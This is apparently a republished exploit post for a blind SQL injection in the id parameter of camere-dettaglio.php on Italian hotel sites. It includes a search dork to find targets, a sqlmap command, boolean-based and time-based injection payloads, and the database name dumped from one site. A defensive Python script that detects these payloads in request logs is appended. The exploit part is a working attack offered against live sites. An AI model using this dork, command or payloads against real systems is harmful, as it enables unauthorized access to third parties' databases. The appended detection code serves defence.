Our sensors found this exploit at:

Below is a copy:

Italian Hotels Blind SQL Injection vulnerability
# Exploit Title: Italian Hotels Blind SQL Injection vulnerability
# Date: 30/11/2019
# Dork: inurl:camere-dettaglio.php?id=
# Exploit Author: H9xHacker
# Tested on: Linux

Reverse check

ip: .php?id= (There are 202 domains hosted on this server.)

# Demo

# Admin control panel path


# Poc:

sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u '' --no-cast --batch --dbs

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=32' AND 2568=2568-- AtOc

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] ristorantelaspada_it_01

Greets:Black Hat Hackers 
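
A detection sketch for the two payload classes in the sqlmap output above, added here as an example (it is not part of the original exploit post): it flags requests to camere-dettaglio.php whose id parameter is not a plain integer and labels the boolean-based and time-based patterns. The request-line format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request lines; the two injected values are the payloads quoted
# in the sqlmap output above, URL-encoded as they would appear in a log.
SAMPLE_REQUESTS = [
    "GET /camere-dettaglio.php?id=32 HTTP/1.1",
    "GET /camere-dettaglio.php?id=32%27%20AND%202568%3D2568--%20AtOc HTTP/1.1",
    "GET /camere-dettaglio.php?id=32%27%20OR%20%28SELECT%209574%20FROM%20"
    "%28SELECT%28SLEEP%285%29%29%29kdFW%29--%20xPIg HTTP/1.1",
    "GET /index.php?page=contatti HTTP/1.1",
]

PLAIN_INT = re.compile(r"[0-9]+")                                   # the only legitimate shape of id
TIME_BASED = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)        # delay primitives
BOOLEAN_BASED = re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)   # e.g. AND 2568=2568


def classify_id(value):
    """Classify one decoded value of the numeric `id` parameter."""
    if PLAIN_INT.fullmatch(value):
        return "ok"
    if TIME_BASED.search(value):
        return "time-based blind"
    if BOOLEAN_BASED.search(value):
        return "boolean-based blind"
    return "non-numeric id"  # still worth alerting on: id should never carry text


def scan(request_lines, page="/camere-dettaglio.php", param="id"):
    """Return (verdict, decoded value) for every suspicious id sent to `page`."""
    findings = []
    for line in request_lines:
        parts = line.split(" ")
        if len(parts) != 3:
            continue  # not a well-formed "METHOD target VERSION" line
        url = urlsplit(parts[1])
        if url.path != page:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((verdict, value))
    return findings


if __name__ == "__main__":
    for verdict, value in scan(SAMPLE_REQUESTS):
        print(f"{verdict}: {value!r}")
```

Log matching of this kind only surfaces probing; the underlying fix is to cast id to an integer or bind it through a prepared statement before it reaches the MySQL query.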

Copyright ©2022 Exploitalert.